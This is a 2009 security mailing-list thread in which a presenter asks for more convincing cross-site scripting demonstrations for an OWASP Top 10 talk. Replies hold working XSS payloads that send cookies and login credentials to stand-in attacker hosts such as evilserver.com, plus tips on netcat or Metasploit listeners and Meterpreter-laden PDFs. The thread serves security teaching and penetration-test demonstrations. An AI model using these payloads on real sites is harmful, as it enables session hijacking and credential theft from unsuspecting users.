It's won't be held online, but I plan to record and post it. Thanks for all of the ideas guys.
Adrian On Fri, May 29, 2009 at 9:54 AM, packetjack <[email protected]> wrote: > Sounds like a sweet presentation you're giving, Adrian. I agree, the > <script>alert("XSS");</script>,is so boring. Kudos to you for making an > interesting presentation! Is this an online presentation? I'd love to see > it if so! I test webapps and often can prove a site is vuln due to the > example given above, but I would like to learn some of the ways you and > others mentioned, ones that will show upper mgt what this "little vuln" is > capable of..... > Mary > > > On Fri, May 29, 2009 at 7:45 AM, Michael Douglas <[email protected]>wrote: > >> While all these samples are really fun, I've lately had great luck by >> making two different XSS attacks when I'm showing folks. >> >> One for the devs -- this tends to be a bit more "fun" and does stuff >> like click trapping. >> >> For marketing or the project managers -- the ones I've found most >> likely to sweep these bugs under the rug -- I send them "brand damage" >> examples. (Cock ring size is freaking hilarious, but would send me to >> HR). So I do things like image swapping, or setting the background to >> a LOLCat or a competitor logo. >> >> The all time XSS FTW moment was about 4 years ago now, when someone >> found an XSS problem on a McDonald's site. Their link was so damn >> sweet, it's what got me interested in web app security. when you >> clicked it, you we sent to a page that had all the McD's wrappings but >> the content section of the window was blank except for in lovely red >> letters it said: "Hey FATTIE! You really shouldn't be eating our >> food!" >> >> >> >> On Fri, May 29, 2009 at 3:35 AM, <[email protected]> wrote: >> > You could use a couple of typical password/cookie stealing examples. >> > >> > Cookie stealing iframe.: >> > "><IFRAME >> > SRC="javascript:window.location=%22 >> http://evilserver.com/evil.php?stuff=%22+document.cookie"; >> > height="1" width="1" frameborder="0"></IFRAME> >> > >> > Altering the logon form.: >> > "><script>window.onload = >> > function()document.loginForm.action=' >> http://evilserver.com/evil.php?details='</script><!---- >> > >> > I like to use the logon form example for my penetration testing >> > presentations as it looks 100% normal to the user, except it redirects >> the >> > Submit button to send the logon information (username/password in most >> > cases) to your evilserver instead of the real server. You can also >> rewrite >> > the code in the users browser to remove password hashing to make it >> easier >> > to get the clear text password. On the server end I usually just put up >> a >> > Metasploit HTTP or a netcat listener on the evilserver.com address to >> output >> > the traffic to a logfile. You can also log it to a Database for mass >> farming >> > of data, but we don't do that kind of thing, we leave that to Bob ;) >> > >> > If you want something evil on the client-side, try an iframe that >> references >> > a PDF file. You can then export a PDF from Metasploit and embed the >> > Meterpreter payload for total world domination. >> > >> > Chris John Riley >> > >> > [email protected]@inet wrote on 28.05.2009 >> 20:50:39: >> > >> >> Ok, I've got yet another presentation coming up, this time on the OWASP >> >> Top 10 >> >> and Mutillidae. One of the things I'm going to cover is XSS. The >> canonical >> >> example of course is: >> >> >> >> <script>alert("XSS");</script> >> >> >> >> but that is boring, and gives folks the impression that XSS is not that >> >> serious. Better short eample swoul be: >> >> >> >> Redirect traffic to your site: >> >> <script>window.location = "http://www.irongeek.com/";</script> >> >> >> >> A little cookie Grabbing: >> >> <script> >> >> new Image().src="http://some-ip/mutillidae/catch.php?cookie= >> >> "+encodeURI(document.cookie); >> >> </script> >> >> >> >> Or maybe a password form to make people think they have to login, but >> it >> >> just >> >> grabs the credentials: >> >> <script> >> >> username=prompt('Please enter your username',' '); >> >> password=prompt('Please enter your password',' '); >> >> document.write("<img src=\"http://attacker.hak/catch.php?username= >> >> "+username+"&password="+password+"\">"); >> >> </script> >> >> >> >> What are other cool thing to inject, besides maybe BeEF, that shows of >> how >> >> XSS >> >> can be a big deal? >> >> >> >> Thanks, >> >> Adrian >> >> _______________________________________________ >> >> Pauldotcom mailing list >> >> [email protected] >> >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> >> Main Web Site: http://pauldotcom.com >> > ---------------------------------------- >> > Raiffeisen Informatik GmbH, Firmenbuchnr. 88239p, Handelsgericht Wien, >> DVR >> > 0486809, UID ATU 16351908 >> > >> > Der Austausch von Nachrichten mit oben angefuehrtem Absender via E-Mail >> > dient ausschliesslich Informationszwecken. Rechtsgeschaeftliche >> Erklaerungen >> > duerfen ueber dieses Medium nicht ausgetauscht werden. >> > Correspondence with above mentioned sender via e-mail is only for >> > information purposes. This medium may not be used for exchange of >> > legally-binding communications. >> > ---------------------------------------- >> > >> > >> > _______________________________________________ >> > Pauldotcom mailing list >> > [email protected] >> > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> > Main Web Site: http://pauldotcom.com >> > >> _______________________________________________ >> Pauldotcom mailing list >> [email protected] >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> Main Web Site: http://pauldotcom.com >> > > > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com >
_______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
